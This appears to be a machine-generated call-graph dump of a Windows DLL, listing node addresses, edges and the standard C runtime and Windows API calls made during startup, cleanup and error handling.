9348->9293 9350 6cdc36c4 9349->9350 9350->9277 9351 6cdc379a GetModuleHandleExW 9350->9351 9352 6cdc37b9 GetProcAddress 9351->9352 9355 6cdc37ce 9351->9355 9352->9355 9353 6cdc37eb 9353->9277 9354 6cdc37e2 FreeLibrary 9354->9353 9355->9353 9355->9354 9357 6cdc3583 ___scrt_is_nonwritable_in_current_image 9356->9357 9372 6cdc488a EnterCriticalSection 9357->9372 9359 6cdc358d 9373 6cdc35c4 9359->9373 9361 6cdc359a 9377 6cdc35b8 9361->9377 9364 6cdc3715 9381 6cdc48e9 GetPEB 9364->9381 9367 6cdc3744 9370 6cdc379a __DllMainCRTStartup@12 3 API calls 9367->9370 9368 6cdc3724 GetPEB 9368->9367 9369 6cdc3734 GetCurrentProcess TerminateProcess 9368->9369 9369->9367 9371 6cdc374c ExitProcess 9370->9371 9372->9359 9374 6cdc35d0 ___scrt_is_nonwritable_in_current_image 9373->9374 9375 6cdc3631 __DllMainCRTStartup@12 9374->9375 9376 6cdc3e4e __DllMainCRTStartup@12 14 API calls 9374->9376 9375->9361 9376->9375 9380 6cdc48d2 LeaveCriticalSection 9377->9380 9379 6cdc35a6 9379->9272 9379->9364 9380->9379 9382 6cdc4903 9381->9382 9384 6cdc371f 9381->9384 9385 6cdc6264 9382->9385 9384->9367 9384->9368 9388 6cdc61e1 9385->9388 9387 6cdc6280 9387->9384 9389 6cdc620f 9388->9389 9393 6cdc620b _free 9388->9393 9389->9393 9394 6cdc611a 9389->9394 9392 6cdc6229 GetProcAddress 9392->9393 9393->9387 9399 6cdc612b ___vcrt_InitializeCriticalSectionEx 9394->9399 9395 6cdc6149 LoadLibraryExW 9396 6cdc6164 GetLastError 9395->9396 9395->9399 9396->9399 9397 6cdc61bf FreeLibrary 9397->9399 9398 6cdc61d6 9398->9392 9398->9393 9399->9395 9399->9397 9399->9398 9400 6cdc6197 LoadLibraryExW 9399->9400 9400->9399 9402 6cdc2bfe 9401->9402 9403 6cdc1c81 9401->9403 9402->9403 9405 6cdc4064 9402->9405 9403->9215 9406 6cdc4bf3 _free 14 API calls 9405->9406 9407 6cdc407c 9406->9407 9407->9402 9409 6cdc3ff1 9408->9409 9410 6cdc4003 ___scrt_uninitialize_crt 9408->9410 9411 6cdc3fff 9409->9411 9419 6cdc6e27 9409->9419 9410->9255 9411->9255 9414 6cdc2c4f 9413->9414 9415 6cdc2c59 9413->9415 9485 6cdc302c 9414->9485 9415->9253 9422 6cdc6cd5 9419->9422 9425 6cdc6c29 9422->9425 9426 6cdc6c35 ___scrt_is_nonwritable_in_current_image 9425->9426 9433 6cdc488a EnterCriticalSection 9426->9433 9428 6cdc6c3f ___scrt_uninitialize_crt 9429 6cdc6cab 9428->9429 9434 6cdc6b9d 9428->9434 9442 6cdc6cc9 9429->9442 9433->9428 9435 6cdc6ba9 ___scrt_is_nonwritable_in_current_image 9434->9435 9445 6cdc6f44 EnterCriticalSection 9435->9445 9437 6cdc6bb3 ___scrt_uninitialize_crt 9438 6cdc6bec 9437->9438 9446 6cdc6ddf 9437->9446 9456 6cdc6c1d 9438->9456 9484 6cdc48d2 LeaveCriticalSection 9442->9484 9444 6cdc6cb7 9444->9411 9445->9437 9447 6cdc6dec 9446->9447 9448 6cdc6df5 9446->9448 9450 6cdc6cd5 ___scrt_uninitialize_crt 66 API calls 9447->9450 9459 6cdc6d7a 9448->9459 9455 6cdc6df2 9450->9455 9453 6cdc6e11 9472 6cdc8442 9453->9472 9455->9438 9483 6cdc6f58 LeaveCriticalSection 9456->9483 9458 6cdc6c0b 9458->9428 9460 6cdc6d92 9459->9460 9464 6cdc6db7 9459->9464 9461 6cdc7170 ___scrt_uninitialize_crt 25 API calls 9460->9461 9460->9464 9462 6cdc6db0 9461->9462 9463 6cdc8c3a ___scrt_uninitialize_crt 62 API calls 9462->9463 9463->9464 9464->9455 9465 6cdc7170 9464->9465 9466 6cdc717c 9465->9466 9467 6cdc7191 9465->9467 9468 6cdc4b83 _free 14 API calls 9466->9468 9467->9453 9469 6cdc7181 9468->9469 9470 6cdc4ac6 __fassign 25 API calls 9469->9470 9471 6cdc718c 9470->9471 9471->9453 9473 6cdc8460 9472->9473 9474 6cdc8453 9472->9474 9476 6cdc84a9 9473->9476 9478 6cdc8487 9473->9478 9475 6cdc4b83 _free 14 API calls 9474->9475 9480 6cdc8458 9475->9480 9477 6cdc4b83 _free 14 API calls 9476->9477 9479 6cdc84ae 9477->9479 9481 6cdc83a0 ___scrt_uninitialize_crt 29 API calls 9478->9481 9482 6cdc4ac6 __fassign 25 API calls 9479->9482 9480->9455 9481->9480 9482->9480 9483->9458 9484->9444 9486 6cdc2c54 9485->9486 9487 6cdc3036 9485->9487 9489 6cdc3083 9486->9489 9493 6cdc3201 9487->9493 9490 6cdc308e 9489->9490 9492 6cdc30ad 9489->9492 9491 6cdc3098 DeleteCriticalSection 9490->9491 9491->9491 9491->9492 9492->9415 9498 6cdc317d 9493->9498 9496 6cdc3233 TlsFree 9497 6cdc3227 9496->9497 9497->9486 9499 6cdc3195 9498->9499 9500 6cdc31b8 9498->9500 9499->9500 9504 6cdc30e3 9499->9504 9500->9496 9500->9497 9503 6cdc31aa GetProcAddress 9503->9500 9509 6cdc30ef ___vcrt_InitializeCriticalSectionEx 9504->9509 9505 6cdc3163 9505->9500 9505->9503 9506 6cdc3105 LoadLibraryExW 9507 6cdc316a 9506->9507 9508 6cdc3123 GetLastError 9506->9508 9507->9505 9510 6cdc3172 FreeLibrary 9507->9510 9508->9509 9509->9505 9509->9506 9511 6cdc3145 LoadLibraryExW 9509->9511 9510->9505 9511->9507 9511->9509 9517 6cdc4016 9512->9517 9515 6cdc302c ___vcrt_uninitialize_ptd 6 API calls 9516 6cdc194f 9515->9516 9516->9205 9520 6cdc482f 9517->9520 9521 6cdc4839 9520->9521 9522 6cdc1de5 9520->9522 9524 6cdc6302 9521->9524 9522->9515 9525 6cdc61e1 _free 5 API calls 9524->9525 9526 6cdc631e 9525->9526 9527 6cdc6339 TlsFree 9526->9527 9528 6cdc6327 9526->9528 9528->9522 9529->9198 9530 6cdc174e 9531 6cdc178c 9530->9531 9532 6cdc1759 9530->9532 9533 6cdc18a8 __DllMainCRTStartup@12 84 API calls 9531->9533 9534 6cdc177e 9532->9534 9535 6cdc175e 9532->9535 9541 6cdc1768 9533->9541 9542 6cdc17a1 9534->9542 9536 6cdc1774 9535->9536 9537 6cdc1763 9535->9537 9561 6cdc1d5b 9536->9561 9537->9541 9556 6cdc1d7a 9537->9556 9543 6cdc17ad ___scrt_is_nonwritable_in_current_image 9542->9543 9569 6cdc1deb 9543->9569 9545 6cdc17b4 __DllMainCRTStartup@12 9546 6cdc17db 9545->9546 9547 6cdc18a0 9545->9547 9553 6cdc1817 ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 9545->9553 9580 6cdc1d4d 9546->9580 9549 6cdc1f8a __DllMainCRTStartup@12 4 API calls 9547->9549 9550 6cdc18a7 9549->9550 9551 6cdc17ea __RTC_Initialize 9551->9553 9583 6cdc1c6b InitializeSListHead 9551->9583 9553->9541 9554 6cdc17f8 9554->9553 9584 6cdc1d22 9554->9584 9645 6cdc3fde 9556->9645 9848 6cdc2c30 9561->9848 9564 6cdc1d64 9564->9541 9567 6cdc1d77 9567->9541 9568 6cdc2c3b 21 API calls 9568->9564 9570 6cdc1df4 9569->9570 9588 6cdc2158 IsProcessorFeaturePresent 9570->9588 9574 6cdc1e05 9579 6cdc1e09 9574->9579 9598 6cdc3fc1 9574->9598 9577 6cdc1e20 9577->9545 9578 6cdc2c46 ___scrt_uninitialize_crt 7 API calls 9578->9579 9579->9545 9639 6cdc1e24 9580->9639 9582 6cdc1d54 9582->9551 9583->9554 9585 6cdc1d27 ___scrt_release_startup_lock 9584->9585 9586 6cdc2158 IsProcessorFeaturePresent 9585->9586 9587 6cdc1d30 9585->9587 9586->9587 9587->9553 9589 6cdc1e00 9588->9589 9590 6cdc2c11 9589->9590 9601 6cdc3047 9590->9601 9594 6cdc2c22 9595 6cdc2c2d 9594->9595 9596 6cdc3083 ___vcrt_uninitialize_locks DeleteCriticalSection 9594->9596 9595->9574 9597 6cdc2c1a 9596->9597 9597->9574 9630 6cdc670d 9598->9630 9602 6cdc3050 9601->9602 9604 6cdc3079 9602->9604 9606 6cdc2c16 9602->9606 9615 6cdc32b5 9602->9615 9605 6cdc3083 ___vcrt_uninitialize_locks DeleteCriticalSection 9604->9605 9605->9606 9606->9597 9607 6cdc2ff9 9606->9607 9620 6cdc31c6 9607->9620 9610 6cdc300e 9610->9594 9613 6cdc3029 9613->9594 9614 6cdc302c ___vcrt_uninitialize_ptd 6 API calls 9614->9610 9616 6cdc317d ___vcrt_InitializeCriticalSectionEx 5 API calls 9615->9616 9617 6cdc32cf 9616->9617 9618 6cdc32ed InitializeCriticalSectionAndSpinCount 9617->9618 9619 6cdc32d8 9617->9619 9618->9619 9619->9602 9621 6cdc317d ___vcrt_InitializeCriticalSectionEx 5 API calls 9620->9621 9622 6cdc31e0 9621->9622 9623 6cdc31f9 TlsAlloc 9622->9623 9624 6cdc3003 9622->9624 9624->9610 9625 6cdc3277 9624->9625 9626 6cdc317d ___vcrt_InitializeCriticalSectionEx 5 API calls 9625->9626 9627 6cdc3291 9626->9627 9628 6cdc32ac TlsSetValue 9627->9628 9629 6cdc301c 9627->9629 9628->9629 9629->9613 9629->9614 9631 6cdc671d 9630->9631 9632 6cdc1e12 9630->9632 9631->9632 9634 6cdc65cd 9631->9634 9632->9577 9632->9578 9635 6cdc65d4 9634->9635 9636 6cdc6617 GetStdHandle 9635->9636 9637 6cdc667d 9635->9637 9638 6cdc662a GetFileType 9635->9638 9636->9635 9637->9631 9638->9635 9640 6cdc1e34 9639->9640 9641 6cdc1e30 9639->9641 9642 6cdc1f8a __DllMainCRTStartup@12 4 API calls 9640->9642 9644 6cdc1e41 ___scrt_release_startup_lock 9640->9644 9641->9582 9643 6cdc1eaa 9642->9643 9644->9582 9651 6cdc45cb 9645->9651 9648 6cdc2c3b 9831 6cdc2f23 9648->9831 9652 6cdc45d5 9651->9652 9654 6cdc1d7f 9651->9654 9653 6cdc6341 _free 6 API calls 9652->9653 9655 6cdc45dc 9653->9655 9654->9648 9655->9654 9656 6cdc6380 _free 6 API calls 9655->9656 9657 6cdc45ef 9656->9657 9659 6cdc4492 9657->9659 9660 6cdc449d 9659->9660 9664 6cdc44ad 9659->9664 9665 6cdc44b3 9660->9665 9663 6cdc4bf3 _free 14 API calls 9663->9664 9664->9654 9666 6cdc44c8 9665->9666 9667 6cdc44ce 9665->9667 9668 6cdc4bf3 _free 14 API calls 9666->9668 9669 6cdc4bf3 _free 14 API calls 9667->9669 9668->9667 9670 6cdc44da 9669->9670 9671 6cdc4bf3 _free 14 API calls 9670->9671 9672 6cdc44e5 9671->9672 9673 6cdc4bf3 _free 14 API calls 9672->9673 9674 6cdc44f0 9673->9674 9675 6cdc4bf3 _free 14 API calls 9674->9675 9676 6cdc44fb 9675->9676 9677 6cdc4bf3 _free 14 API calls 9676->9677 9678 6cdc4506 9677->9678 9679 6cdc4bf3 _free 14 API calls 9678->9679 9680 6cdc4511 9679->9680 9681 6cdc4bf3 _free 14 API calls 9680->9681 9682 6cdc451c 9681->9682 9683 6cdc4bf3 _free 14 API calls 9682->9683 9684 6cdc4527 9683->9684 9685 6cdc4bf3 _free 14 API calls 9684->9685 9686 6cdc4535 9685->9686 9691 6cdc42df 9686->9691 9692 6cdc42eb ___scrt_is_nonwritable_in_current_image 9691->9692 9707 6cdc488a EnterCriticalSection 9692->9707 9694 6cdc42f5 9695 6cdc431f 9694->9695 9698 6cdc4bf3 _free 14 API calls 9694->9698 9708 6cdc433e 9695->9708 9698->9695 9699 6cdc434a 9700 6cdc4356 ___scrt_is_nonwritable_in_current_image 9699->9700 9712 6cdc488a EnterCriticalSection 9700->9712 9702 6cdc4360 9713 6cdc4580 9702->9713 9704 6cdc4373 9717 6cdc4393 9704->9717 9707->9694 9711 6cdc48d2 LeaveCriticalSection 9708->9711 9710 6cdc432c 9710->9699 9711->9710 9712->9702 9714 6cdc45b6 __fassign 9713->9714 9715 6cdc458f __fassign 9713->9715 9714->9704 9715->9714 9720 6cdc72d8 9715->9720 9830 6cdc48d2 LeaveCriticalSection 9717->9830 9719 6cdc4381 9719->9663 9722 6cdc7358 9720->9722 9723 6cdc72ee 9720->9723 9724 6cdc4bf3 _free 14 API calls 9722->9724 9747 6cdc73a6 9722->9747 9723->9722 9727 6cdc7321 9723->9727 9730 6cdc4bf3 _free 14 API calls 9723->9730 9725 6cdc737a 9724->9725 9726 6cdc4bf3 _free 14 API calls 9725->9726 9728 6cdc738d 9726->9728 9732 6cdc4bf3 _free 14 API calls 9727->9732 9746 6cdc7343 9727->9746 9733 6cdc4bf3 _free 14 API calls 9728->9733 9729 6cdc4bf3 _free 14 API calls 9734 6cdc734d 9729->9734 9736 6cdc7316 9730->9736 9731 6cdc73b4 9735 6cdc7414 9731->9735 9742 6cdc4bf3 14 API calls _free 9731->9742 9737 6cdc7338 9732->9737 9738 6cdc739b 9733->9738 9739 6cdc4bf3 _free 14 API calls 9734->9739 9740 6cdc4bf3 _free 14 API calls 9735->9740 9748 6cdc9207 9736->9748 9776 6cdc9305 9737->9776 9744 6cdc4bf3 _free 14 API calls 9738->9744 9739->9722 9745 6cdc741a 9740->9745 9742->9731 9744->9747 9745->9714 9746->9729 9788 6cdc7449 9747->9788 9749 6cdc9218 9748->9749 9775 6cdc9301 9748->9775 9750 6cdc9229 9749->9750 9751 6cdc4bf3 _free 14 API calls 9749->9751 9752 6cdc923b 9750->9752 9753 6cdc4bf3 _free 14 API calls 9750->9753 9751->9750 9754 6cdc924d 9752->9754 9755 6cdc4bf3 _free 14 API calls 9752->9755 9753->9752 9756 6cdc925f 9754->9756 9757 6cdc4bf3 _free 14 API calls 9754->9757 9755->9754 9758 6cdc9271 9756->9758 9759 6cdc4bf3 _free 14 API calls 9756->9759 9757->9756 9760 6cdc9283 9758->9760 9761 6cdc4bf3 _free 14 API calls 9758->9761 9759->9758 9762 6cdc9295 9760->9762 9763 6cdc4bf3 _free 14 API calls 9760->9763 9761->9760 9764 6cdc92a7 9762->9764 9765 6cdc4bf3 _free 14 API calls 9762->9765 9763->9762 9766 6cdc4bf3 _free 14 API calls 9764->9766 9768 6cdc92b9 9764->9768 9765->9764 9766->9768 9767 6cdc92cb 9770 6cdc92dd 9767->9770 9771 6cdc4bf3 _free 14 API calls 9767->9771 9768->9767 9769 6cdc4bf3 _free 14 API calls 9768->9769 9769->9767 9772 6cdc92ef 9770->9772 9773 6cdc4bf3 _free 14 API calls 9770->9773 9771->9770 9774 6cdc4bf3 _free 14 API calls 9772->9774 9772->9775 9773->9772 9774->9775 9775->9727 9777 6cdc9312 9776->9777 9787 6cdc936a 9776->9787 9778 6cdc9322 9777->9778 9779 6cdc4bf3 _free 14 API calls 9777->9779 9780 6cdc9334 9778->9780 9781 6cdc4bf3 _free 14 API calls 9778->9781 9779->9778 9782 6cdc9346 9780->9782 9783 6cdc4bf3 _free 14 API calls 9780->9783 9781->9780 9784 6cdc4bf3 _free 14 API calls 9782->9784 9786 6cdc9358 9782->9786 9783->9782 9784->9786 9785 6cdc4bf3 _free 14 API calls 9785->9787 9786->9785 9786->9787 9787->9746 9789 6cdc7456 9788->9789 9790 6cdc7475 9788->9790 9789->9790 9794 6cdc93a6 9789->9794 9790->9731 9793 6cdc4bf3 _free 14 API calls 9793->9790 9795 6cdc746f 9794->9795 9796 6cdc93b7 9794->9796 9795->9793 9797 6cdc936e __fassign 14 API calls 9796->9797 9798 6cdc93bf 9797->9798 9799 6cdc936e __fassign 14 API calls 9798->9799 9800 6cdc93ca 9799->9800 9801 6cdc936e __fassign 14 API calls 9800->9801 9802 6cdc93d5 9801->9802 9803 6cdc936e __fassign 14 API calls 9802->9803 9804 6cdc93e0 9803->9804 9805 6cdc936e __fassign 14 API calls 9804->9805 9806 6cdc93ee 9805->9806 9807 6cdc4bf3 _free 14 API calls 9806->9807 9808 6cdc93f9 9807->9808 9809 6cdc4bf3 _free 14 API calls 9808->9809 9810 6cdc9404 9809->9810 9811 6cdc4bf3 _free 14 API calls 9810->9811 9812 6cdc940f 9811->9812 9813 6cdc936e __fassign 14 API calls 9812->9813 9814 6cdc941d 9813->9814 9815 6cdc936e __fassign 14 API calls 9814->9815 9816 6cdc942b 9815->9816 9817 6cdc936e __fassign 14 API calls 9816->9817 9818 6cdc943c 9817->9818 9819 6cdc936e __fassign 14 API calls 9818->9819 9820 6cdc944a 9819->9820 9821 6cdc936e __fassign 14 API calls 9820->9821 9822 6cdc9458 9821->9822 9823 6cdc4bf3 _free 14 API calls 9822->9823 9824 6cdc9463 9823->9824 9825 6cdc4bf3 _free 14 API calls 9824->9825 9826 6cdc946e 9825->9826 9827 6cdc4bf3 _free 14 API calls 9826->9827 9828 6cdc9479 9827->9828 9829 6cdc4bf3 _free 14 API calls 9828->9829 9829->9795 9830->9719 9832 6cdc2f30 9831->9832 9838 6cdc1d84 9831->9838 9835 6cdc2f3e 9832->9835 9839 6cdc323c 9832->9839 9834 6cdc3277 ___vcrt_FlsSetValue 6 API calls 9836 6cdc2f4e 9834->9836 9835->9834 9844 6cdc2f07 9836->9844 9838->9541 9840 6cdc317d ___vcrt_InitializeCriticalSectionEx 5 API calls 9839->9840 9841 6cdc3256 9840->9841 9842 6cdc326e TlsGetValue 9841->9842 9843 6cdc3262 9841->9843 9842->9843 9843->9835 9845 6cdc2f1e 9844->9845 9846 6cdc2f11 9844->9846 9845->9838 9846->9845 9847 6cdc4064 ___std_type_info_destroy_list 14 API calls 9846->9847 9847->9845 9854 6cdc2f67 9848->9854 9850 6cdc1d60 9850->9564 9851 6cdc3fd3 9850->9851 9852 6cdc474e _free 14 API calls 9851->9852 9853 6cdc1d6c 9852->9853 9853->9567 9853->9568 9855 6cdc2f70 9854->9855 9856 6cdc2f73 GetLastError 9854->9856 9855->9850 9857 6cdc323c ___vcrt_FlsGetValue 6 API calls 9856->9857 9858 6cdc2f88 9857->9858 9859 6cdc2fed SetLastError 9858->9859 9860 6cdc3277 ___vcrt_FlsSetValue 6 API calls 9858->9860 9867 6cdc2fa7 9858->9867 9859->9850 9861 6cdc2fa1 9860->9861 9862 6cdc2fc9 9861->9862 9863 6cdc3277 ___vcrt_FlsSetValue 6 API calls 9861->9863 9861->9867 9864 6cdc3277 ___vcrt_FlsSetValue 6 API calls 9862->9864 9865 6cdc2fdd 9862->9865 9863->9862 9864->9865 9866 6cdc4064 ___std_type_info_destroy_list 14 API calls 9865->9866 9866->9867 9867->9859 9965 6cdc3ece 9968 6cdc3cdd 9965->9968 9969 6cdc3cec 9968->9969 9974 6cdc3c4f 9969->9974 9972 6cdc3c4f 14 API calls 9973 6cdc3d11 9972->9973 9975 6cdc3c5c 9974->9975 9979 6cdc3c79 9974->9979 9976 6cdc3c73 9975->9976 9977 6cdc4bf3 _free 14 API calls 9975->9977 9978 6cdc4bf3 _free 14 API calls 9976->9978 9977->9975 9978->9979 9979->9972 11068 6cdc650e GetStartupInfoW 11069 6cdc65c8 11068->11069 11070 6cdc6534 11068->11070 11070->11069 11071 6cdc81c1 26 API calls 11070->11071 11072 6cdc655c 11071->11072 11072->11069 11073 6cdc658c GetFileType 11072->11073 11073->11072 10417 6cdc4849 10418 6cdc4854 10417->10418 10419 6cdc63c2 6 API calls 10418->10419 10420 6cdc487d 10418->10420 10422 6cdc4879 10418->10422 10419->10418 10423 6cdc48a1 10420->10423 10424 6cdc48cd 10423->10424 10425 6cdc48ae 10423->10425 10424->10422 10426 6cdc48b8 DeleteCriticalSection 10425->10426 10426->10424 10426->10426 11074 6cdc3f04 11075 6cdc2c46 ___scrt_uninitialize_crt 7 API calls 11074->11075 11076 6cdc3f0b 11075->11076 9980 6cdc2cc5 9983 6cdc2d13 9980->9983 9984 6cdc2cd0 9983->9984 9985 6cdc2d1c 9983->9985 9985->9984 9992 6cdc2f59 9985->9992 9987 6cdc2d57 9988 6cdc2f59 47 API calls 9987->9988 9989 6cdc2d62 9988->9989 10005 6cdc4028 9989->10005 9993 6cdc2f67 23 API calls 9992->9993 9994 6cdc2f5e 9993->9994 9994->9987 10011 6cdc690c 9994->10011 9997 6cdc40f3 IsProcessorFeaturePresent 9999 6cdc40ff 9997->9999 10041 6cdc491a 9999->10041 10001 6cdc40e9 10001->9997 10004 6cdc4112 10001->10004 10047 6cdc380b 10004->10047 10006 6cdc4034 ___scrt_is_nonwritable_in_current_image 10005->10006 10007 6cdc45f7 __fassign 37 API calls 10006->10007 10008 6cdc4039 10007->10008 10009 6cdc40d9 __fassign 37 API calls 10008->10009 10010 6cdc4063 10009->10010 10050 6cdc683e 10011->10050 10014 6cdc6951 10015 6cdc695d ___scrt_is_nonwritable_in_current_image 10014->10015 10016 6cdc474e _free 14 API calls 10015->10016 10020 6cdc698a __fassign 10015->10020 10023 6cdc6984 __fassign 10015->10023 10016->10023 10017 6cdc69d1 10018 6cdc4b83 _free 14 API calls 10017->10018 10019 6cdc69d6 10018->10019 10061 6cdc4ac6 10019->10061 10022 6cdc69fd 10020->10022 10064 6cdc488a EnterCriticalSection 10020->10064 10027 6cdc6b30 10022->10027 10028 6cdc6a3f 10022->10028 10038 6cdc6a6e 10022->10038 10023->10017 10023->10020 10024 6cdc69bb 10023->10024 10024->10001 10033 6cdc6b3b 10027->10033 10096 6cdc48d2 LeaveCriticalSection 10027->10096 10028->10038 10065 6cdc45f7 GetLastError 10028->10065 10030 6cdc380b __fassign 23 API calls 10034 6cdc6b43 10030->10034 10033->10030 10035 6cdc45f7 __fassign 37 API calls 10039 6cdc6ac3 10035->10039 10037 6cdc45f7 __fassign 37 API calls 10037->10038 10092 6cdc6add 10038->10092 10039->10024 10040 6cdc45f7 __fassign 37 API calls 10039->10040 10040->10024 10042 6cdc4936 __DllMainCRTStartup@12 10041->10042 10043 6cdc4962 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10042->10043 10044 6cdc4a33 __DllMainCRTStartup@12 10043->10044 10045 6cdc1740 _ValidateLocalCookies 5 API calls 10044->10045 10046 6cdc4a51 10045->10046 10046->10004 10048 6cdc36b1 __DllMainCRTStartup@12 23 API calls 10047->10048 10049 6cdc381c 10048->10049 10051 6cdc684a ___scrt_is_nonwritable_in_current_image 10050->10051 10056 6cdc488a EnterCriticalSection 10051->10056 10053 6cdc6858 10057 6cdc6896 10053->10057 10056->10053 10060 6cdc48d2 LeaveCriticalSection 10057->10060 10059 6cdc40de 10059->10001 10059->10014 10060->10059 10097 6cdc4a62 10061->10097 10063 6cdc4ad2 10063->10024 10064->10022 10066 6cdc460e 10065->10066 10067 6cdc4614 10065->10067 10069 6cdc6341 _free 6 API calls 10066->10069 10068 6cdc6380 _free 6 API calls 10067->10068 10090 6cdc461a SetLastError 10067->10090 10070 6cdc4632 10068->10070 10069->10067 10071 6cdc4b96 _free 14 API calls 10070->10071 10070->10090 10073 6cdc4642 10071->10073 10074 6cdc464a 10073->10074 10075 6cdc4661 10073->10075 10078 6cdc6380 _free 6 API calls 10074->10078 10080 6cdc6380 _free 6 API calls 10075->10080 10076 6cdc46ae 10109 6cdc40d9 10076->10109 10077 6cdc46a8 10077->10037 10081 6cdc4658 10078->10081 10083 6cdc466d 10080->10083 10088 6cdc4bf3 _free 14 API calls 10081->10088 10084 6cdc4671 10083->10084 10085 6cdc4682 10083->10085 10086 6cdc6380 _free 6 API calls 10084->10086 10087 6cdc43f9 _free 14 API calls 10085->10087 10086->10081 10089 6cdc468d 10087->10089 10088->10090 10091 6cdc4bf3 _free 14 API calls 10089->10091 10090->10076 10090->10077 10091->10090 10093 6cdc6ab4 10092->10093 10094 6cdc6ae3 10092->10094 10093->10024 10093->10035 10093->10039 10120 6cdc48d2 LeaveCriticalSection 10094->10120 10096->10033 10098 6cdc474e _free 14 API calls 10097->10098 10099 6cdc4a6d 10098->10099 10100 6cdc4a7b 10099->10100 10105 6cdc4ad6 IsProcessorFeaturePresent 10099->10105 10100->10063 10102 6cdc4ac5 10103 6cdc4a62 __fassign 25 API calls 10102->10103 10104 6cdc4ad2 10103->10104 10104->10063 10106 6cdc4ae2 10105->10106 10107 6cdc491a __fassign 8 API calls 10106->10107 10108 6cdc4af7 GetCurrentProcess TerminateProcess 10107->10108 10108->10102 10110 6cdc690c __fassign 2 API calls 10109->10110 10111 6cdc40de 10110->10111 10113 6cdc6951 __fassign 36 API calls 10111->10113 10116 6cdc40e9 10111->10116 10112 6cdc40f3 IsProcessorFeaturePresent 10114 6cdc40ff 10112->10114 10113->10116 10117 6cdc491a __fassign 8 API calls 10114->10117 10115 6cdc380b __fassign 23 API calls 10118 6cdc411c 10115->10118 10116->10112 10119 6cdc4112 10116->10119 10117->10119 10119->10115 10120->10093 11004 6cdca585 11005 6cdca5ad 11004->11005 11006 6cdca5e5 11005->11006 11007 6cdca5de 11005->11007 11008 6cdca5d7 11005->11008 11013 6cdca640 11007->11013 11010 6cdca657 20 API calls 11008->11010 11012 6cdca5dc 11010->11012 11014 6cdca660 11013->11014 11015 6cdcab73 __startOneArgErrorHandling 20 API calls 11014->11015 11016 6cdca5e3 11015->11016 10121 6cdc64c6 10122 6cdc64f7 10121->10122 10123 6cdc64d1 10121->10123 10123->10122 10124 6cdc64e1 FreeLibrary 10123->10124 10124->10123 10302 6cdca887 10303 6cdca8a0 __startOneArgErrorHandling 10302->10303 10305 6cdca8c9 __startOneArgErrorHandling 10303->10305 10306 6cdcacc5 10303->10306 10307 6cdcacfe __startOneArgErrorHandling 10306->10307 10309 6cdcad25 __startOneArgErrorHandling 10307->10309 10317 6cdcafa1 10307->10317 10310 6cdcad68 10309->10310 10311 6cdcad43 10309->10311 10329 6cdcb297 10310->10329 10321 6cdcb2c6 10311->10321 10314 6cdcad63 __startOneArgErrorHandling 10315 6cdc1740 _ValidateLocalCookies 5 API calls 10314->10315 10316 6cdcad8c 10315->10316 10316->10305 10318 6cdcafcc __raise_exc 10317->10318 10319 6cdcb1c5 RaiseException 10318->10319 10320 6cdcb1de 10319->10320 10320->10309 10322 6cdcb2d5 10321->10322 10323 6cdcb349 __startOneArgErrorHandling 10322->10323 10324 6cdcb2f4 __startOneArgErrorHandling 10322->10324 10325 6cdcb297 __startOneArgErrorHandling 14 API calls 10323->10325 10327 6cdcb342 10324->10327 10328 6cdcb297 __startOneArgErrorHandling 14 API calls 10324->10328 10326 6cdcb35e 10325->10326 10326->10314 10327->10314 10328->10327 10330 6cdcb2b9 10329->10330 10331 6cdcb2a4 10329->10331 10333 6cdc4b83 _free 14 API calls 10330->10333 10332 6cdcb2be 10331->10332 10334 6cdc4b83 _free 14 API calls 10331->10334 10332->10314 10333->10332 10335 6cdcb2b1 10334->10335 10335->10314 11017 6cdc1d87 11019 6cdc1d8f ___scrt_release_startup_lock 11017->11019 11021 6cdc33ff 11019->11021 11020 6cdc1db7 11022 6cdc340e 11021->11022 11023 6cdc3412 11021->11023 11022->11020 11026 6cdc341f 11023->11026 11027 6cdc474e _free 14 API calls 11026->11027 11028 6cdc341b 11027->11028 11028->11020 10464 6cdc7600 10465 6cdc763a 10464->10465 10466 6cdc4b83 _free 14 API calls 10465->10466 10471 6cdc764e 10465->10471 10467 6cdc7643 10466->10467 10468 6cdc4ac6 __fassign 25 API calls 10467->10468 10468->10471 10469 6cdc1740 _ValidateLocalCookies 5 API calls 10470 6cdc765b 10469->10470 10471->10469 10336 6cdc6681 10337 6cdc668d ___scrt_is_nonwritable_in_current_image 10336->10337 10348 6cdc488a EnterCriticalSection 10337->10348 10339 6cdc6694 10349 6cdc81c1 10339->10349 10342 6cdc66b2 10368 6cdc66d8 10342->10368 10347 6cdc65cd 2 API calls 10347->10342 10348->10339 10350 6cdc81cd ___scrt_is_nonwritable_in_current_image 10349->10350 10351 6cdc81d6 10350->10351 10352 6cdc81f7 10350->10352 10353 6cdc4b83 _free 14 API calls 10351->10353 10371 6cdc488a EnterCriticalSection 10352->10371 10355 6cdc81db 10353->10355 10356 6cdc4ac6 __fassign 25 API calls 10355->10356 10357 6cdc66a3 10356->10357 10357->10342 10362 6cdc6517 GetStartupInfoW 10357->10362 10358 6cdc822f 10379 6cdc8256 10358->10379 10360 6cdc8203 10360->10358 10372 6cdc8111 10360->10372 10363 6cdc65c8 10362->10363 10364 6cdc6534 10362->10364 10363->10347 10364->10363 10365 6cdc81c1 26 API calls 10364->10365 10366 6cdc655c 10365->10366 10366->10363 10367 6cdc658c GetFileType 10366->10367 10367->10366 10383 6cdc48d2 LeaveCriticalSection 10368->10383 10370 6cdc66c3 10371->10360 10373 6cdc4b96 _free 14 API calls 10372->10373 10376 6cdc8123 10373->10376 10374 6cdc8130 10375 6cdc4bf3 _free 14 API calls 10374->10375 10377 6cdc8185 10375->10377 10376->10374 10378 6cdc63c2 6 API calls 10376->10378 10377->10360 10378->10376 10382 6cdc48d2 LeaveCriticalSection 10379->10382 10381 6cdc825d 10381->10357 10382->10381 10383->10370 11029 6cdc9981 11030 6cdc99a5 11029->11030 11031 6cdc99f6 11030->11031 11033 6cdc9a81 __startOneArgErrorHandling 11030->11033 11034 6cdc9a08 11031->11034 11037 6cdca693 11031->11037 11035 6cdcacc5 20 API calls 11033->11035 11036 6cdca8c9 __startOneArgErrorHandling 11033->11036 11035->11036 11038 6cdca6a6 DecodePointer 11037->11038 11039 6cdca6b6 11037->11039 11038->11039 11040 6cdca6fa 11039->11040 11041 6cdca741 11039->11041 11042 6cdca6e5 11039->11042 11040->11041 11043 6cdc4b83 _free 14 API calls 11040->11043 11041->11034 11042->11041 11044 6cdc4b83 _free 14 API calls 11042->11044 11043->11041 